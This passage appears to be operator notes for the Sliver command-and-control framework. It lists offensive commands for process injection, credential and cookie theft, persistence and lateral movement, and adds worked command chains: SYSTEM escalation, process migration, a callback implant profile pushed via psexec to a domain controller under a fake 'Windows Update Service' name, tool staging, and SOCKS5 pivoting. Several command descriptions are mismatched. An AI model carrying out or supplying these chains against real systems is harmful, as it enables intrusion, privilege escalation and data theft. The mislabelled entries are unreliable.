  remote-process-list-handles    list the various handles a process has open
  remote-reg-delete              Delete a registry key or value
  remote-reg-save                backup a registry have to a file on disk (requires Enabled SEBackup Priv)
  remote-reg-set                 Dumps the specified process to the specified output file
  remote-sc-config               configure an existing service
  remote-sc-create               Create a new service on a windows system
  remote-sc-delete               delete a service from a windows based computer
  remote-sc-description          change description of a server
  remote-sc-start                Start service on a windows based system
  remote-sc-stop                 stop service on a windows based system
  remote-sc_failure              sc_failure
  remote-schtasks-delete         Delete a scheduled task
  remote-schtasks-stop           stop a running scheduled task
  remote-schtaskscreate          Unlock and enable a local / remote user account
  remote-schtasksrun             run a scheduled task
  remote-setuserpass             set the password for a given user account
  remote-shspawnas               spawn / inject as specified user
  remote-slackKey                Decrypts the provided base64 encoded Chrome key
  remote-slack_cookie            Collect the Slack authentication cookie from a Slack process
  remote-suspendresume           uspend a process by pid
  remote-unexpireuser            Enables and unlocks the specified user account
  sa-adcs-enum                   Enumerates CAs and templates in the AD using Win32 functions
  sa-adcs-enum-com               Enumerates CAs and templates in the AD using ICertConfig COM object
  sa-adcs-enum-com2              Enumerates CAs and templates in the AD using IX509PolicyServerListManager COM object
  sa-adv-audit-policies          Retrieves advanced security audit policies
  sa-arp                         Lists ARP table
  sa-cacls                       Lists user permissions for the specified file, wildcards supported
  sa-dir                         Lists a target directory using BOF.
  sa-driversigs                  Enumerate installed services Image paths
  sa-enum-filter-driver          Enumerates all the filter drivers
  sa-enum-local-sessions         Enumerate the currently attached user sessions both local and over rdp
  sa-env                         List process environment variables
  sa-find-loaded-module          Finds what processes *modulepart* is loaded into, optionally searching just *procnamepart*
  sa-get-netsession              Enumerates all sessions on the specified computer or the local one
  sa-get-netsession2             Modified version of netsession that supports BOFHound
  sa-get-password-policy         Gets target server or domain's configured password policy and lockouts
  sa-ipconfig                    Simply gets ipv4 addresses, hostname and dns server
  sa-ldapsearch                  Execute LDAP searches (non paged)
  sa-list_firewall_rules         List Windows firewall rules
  sa-listdns                     Pulls dns cache entries, attempts to query and resolve each
  sa-listmods                    List a process' modules (DLL)
  sa-locale                      List system locale language, locale ID, date, time, and country
  sa-netgroup                    Lists Groups from the default (or specified) domain
  sa-netlocalgroup               List local groups from the local (or specified) computer
  sa-netlocalgroup2              List server group members
  sa-netloggedon                 Return users logged on the local or remote computer
  sa-netloggedon2                Modified version of netloggedon that supports BOFHound
  sa-netshares                   List shares on local or remote computer
  sa-netstat                     TCP / UDP IPv4 netstat listing
  sa-nettime                     Display time on remote computer
  sa-netuptime                   Return information about the boot time on the local or remote computer
  sa-netuser                     Pulls info about specific user.
  sa-netuserenum                 Net user enumeration
  sa-netview                     Net view
  sa-notepad                     Search for open notepad and notepad++ windows and grab text from the editor control object
  sa-nslookup                    Makes a dns query. NOTE: Some situations are limited due to observed crashes
  sa-probe                       Check if a specific port is open
  sa-reg-query                   Query the Windows registry
  sa-regsession                  Return logged on user SIDs by enumerating HKEY_USERS
  sa-routeprint                  Prints IPv4 configured routes
  sa-sc-enum                     Enumerate Windows services
  sa-sc-qc                       Queries the configuration information for a specified service.
  sa-sc-qdescription             sc qdescription implementation in bof
  sa-sc-qfailure                 sc qfailure implementation in bof
  sa-sc-qtriggerinfo             Queries a service for trigger conditions.
  sa-sc-query                    sc query implementation in bof
  sa-schtasksenum                Enumerates all scheduled tasks on the local or if provided remote machine
  sa-schtasksquery               Queries the given task from the local or if provided remote machine
  sa-tasklist                    Get a list of running processes including PID, PPID and CommandLine (uses wmi)
  sa-uptime                      Prints system boot time and how long it's been since then
  sa-vssenum                     Enumerates shadow copies on some server 2012+ machines
  sa-whoami                      Simulates whoami /all
  sa-windowlist                  Lists visible windows in the current users session
  sa-wmi-query                   Run a wmi query and display results in CSV format
  scshell                        Fileless lateral movement
  secinject                      Section Mapping Process Injection
  syscalls_shinject              Inject shellcode (either custom or beacon) into remote process using Syscalls
  tgtdelegation                  tgtdelegation: Obtain a usable Kerberos TGT
  threadless-inject              Execute shellcode within a remote process via hooking function calls.
  unhook-bof                     Remove API hooks from a Beacon process.
  winrm                          Execute commands remotely via WinRM


Sliver - 3rd Party macros:
==========================
  certify        [Certify] Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services
  krbrelayup     [KrbRelayUp] A universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).
  mlokit         [mlokit] MLOps Attack Toolkit
  nps            [NoPowerShell] PowerShell rebuilt in C# for Red Teaming purposes
  rubeus         [Rubeus] Rubeus is a C# tool set for raw Kerberos interaction and abuses.
  seatbelt       [Seatbelt] Seatbelt is a C# project that performs a number of security oriented host-survey 'safety checks'
  sharp-hound-3  [Sharp Hound 3] C# based BloodHound Ingestor
  sharp-hound-4  [SharpHound v4] C# based BloodHound Ingestor
  sharp-smbexec  [Sharp SMBExec] A native C# conversion of the Invoke-SMBExec powershell script
  sharp-wmi      [Sharp WMI] C# implementation of various WMI functionality
  sharpchrome    [SharpChrome] adaptation of work from @gentilkiwi and @djhohnstein, specifically his SharpChrome project
  sharpdpapi     [SharpDPAPI] C# port of some DPAPI functionality from @gentilkiwi's Mimikatz project
  sharpersist    [SharPersist] Windows persistence toolkit
  sharplaps      [SharpLAPS] Retrieve LAPS password from LDAP
  sharpmapexec   [SharpMapExec] A sharpen version of CrackMapExec
  sharprdp       [SharpRDP] Remote Desktop Protocol .NET Console Application for Authenticated Command Execution
  sharpsccm      [SharpSCCM] A C# utility for interacting with SCCM
  sharpsecdump   [SharpSecDump] C# port of impacket's secretsdump.py functionality
  sharpsh        [sharpsh] C# .Net Framework program that uses RunspaceFactory for Powershell command execution.
  sharpup        [SharpUp] C# port of various PowerUp functionality
  sharpview      [SharpView] C# implementation of harmj0y's PowerView
  sqlrecon       [sqlrecon] MS SQL toolkit designed for offensive reconnaissance and post-exploitation


Sliver - Windows:
=================
  backdoor          Infect a remote file with a sliver shellcode
  dllhijack         Plant a DLL for a hijack scenario
  execute-assembly  Loads and executes a .NET assembly in a child process (Windows Only)
  getprivs          Get current privileges (Windows only)
  getsystem         Spawns a new sliver session as the NT AUTHORITY\SYSTEM user (Windows Only)
  impersonate       Impersonate a logged in user.
  make-token        Create a new Logon Session with the specified credentials
  migrate           Migrate into a remote process
  psexec            Start a sliver service on a remote target
  registry          Windows registry operations
  rev2self          Revert to self: lose stolen Windows token
  runas             Run a new process in the context of the designated user (Windows Only)
  spawndll          Load and execute a Reflective DLL in a remote process
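
Worked chain for the Windows commands above (added example, not from the Sliver docs or the original notes; the implant name `agent`, the `corp.local` account, the PID 4128, the listener IP and the profile name `win-svc` are placeholders):

```console
# select the session, then confirm user context and token privileges before escalating
[server] sliver > use agent
[server] sliver (agent) > whoami
[server] sliver (agent) > getprivs

# run a C# tool straight from the operator box; by default it is loaded into a sacrificial child process, not the implant itself
[server] sliver (agent) > execute-assembly /opt/tools/Seatbelt.exe -group=system

# escalate: getsystem needs local admin/SeDebugPrivilege and spawns a SECOND session as SYSTEM, the original one stays up
[server] sliver (agent) > getsystem
[server] sliver (agent) > sessions

# from the SYSTEM session, move into a long-lived process so the implant survives the parent exiting
[server] sliver (agent) > ps -e explorer.exe
[server] sliver (agent) > migrate 4128

# lateral movement: build a service-format profile once, then push it over SMB using a fresh logon token
[server] sliver > profiles new --mtls 10.10.14.5 --format service win-svc
[server] sliver (agent) > make-token -u svc_backup -d corp.local -p 'Passw0rd!'
[server] sliver (agent) > psexec --profile win-svc --service-name WinUpdateSvc --service-description "Windows Update Service" dc01.corp.local

# drop the stolen/created token when done so later tasks run as the implant's own user again
[server] sliver (agent) > rev2self
```

`psexec` needs the profile's listener (`mtls`) already running and ADMIN$ access on the target, and it writes a service binary to disk; `scshell` from the armory list is the fileless alternative. `make-token` only affects network authentication (logon type 9), so `whoami` will still show the original user afterwards; check `execute-assembly --help` for the in-process and hosting-process switches before running tools that are noisy as child processes.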


Sliver:
=======
  cat                Dump file to stdout
  cd                 Change directory
  chmod              Change permissions on a file or directory
  chown              Change owner on a file or directory
  chtimes            Change access and modification times on a file (timestomp)
  close              Close an interactive session without killing the remote process
  download           Download a file
  execute            Execute a program on the remote system
  execute-shellcode  Executes the given shellcode in the sliver process
  extensions         Manage extensions
  getgid             Get session process GID
  getpid             Get session pid
  getuid             Get session process UID
  ifconfig           View network interface configurations
  info               Get info about session
  interactive        Task a beacon to open an interactive session (Beacon only)
  kill               Kill a session
  ls                 List current directory
  memfiles           List current memfiles
  mkdir              Make a directory
  msf                Execute an MSF payload in the current process
  msf-inject         Inject an MSF payload into a process
  mv                 Move or rename a file
  netstat            Print network connection information
  ping               Send round trip message to implant (does not use ICMP)
  pivots             List pivots for active session
  portfwd            In-band TCP port forwarding
  procdump           Dump process memory
  ps                 List remote processes
  pwd                Print working directory
  reconfig           Reconfigure the active beacon/session
  rename             Rename the active beacon/session
  rm                 Remove a file or directory
  rportfwd           reverse port forwardings
  screenshot         Take a screenshot
  shell              Start an interactive shell
  shikata-ga-nai     Polymorphic binary shellcode encoder (ノ ゜Д゜)ノ ︵ 仕方がない
  sideload           Load and execute a shared object (shared library/DLL) in a remote process
  socks5             In-band SOCKS5 Proxy
  ssh                Run a SSH command on a remote host
  terminate          Terminate a process on the remote system
  upload             Upload a file
  whoami             Get session user execution context
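
Host triage, file handling and pivoting with the core commands above (added example, not from the Sliver docs or the original notes; tool paths, the 10.10.20.5 target and the local port are placeholders):

```console
# where are we, which interfaces and live connections does this host have (internal ranges to pivot into)
[server] sliver (agent) > info
[server] sliver (agent) > ifconfig
[server] sliver (agent) > netstat

# stage a tool, run it with stdout captured (-o), pull the result back, then clean up
[server] sliver (agent) > upload /opt/tools/winPEASx64.exe C:\Windows\Temp\wp.exe
[server] sliver (agent) > execute -o C:\Windows\Temp\wp.exe quiet
[server] sliver (agent) > download C:\Users\Public\report.txt /tmp/loot/
[server] sliver (agent) > rm C:\Windows\Temp\wp.exe

# reach an internal host through the implant: a single port first, then a full SOCKS5 proxy
[server] sliver (agent) > portfwd add -r 10.10.20.5:3389 -b 127.0.0.1:13389
[server] sliver (agent) > portfwd
[server] sliver (agent) > socks5 start

# tear the tunnels down when finished (portfwd ids come from the listing above)
[server] sliver (agent) > socks5 stop
[server] sliver (agent) > portfwd rm -i 1
```

`socks5 start` listens on 127.0.0.1:1081 by default, so `socks5 127.0.0.1 1081` in proxychains.conf routes operator tools through the implant. Both `portfwd` and `socks5` are in-band: every connection rides the implant's C2 channel and needs a session, so on a beacon run `interactive` first and expect throughput to be limited by the check-in interval and jitter.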
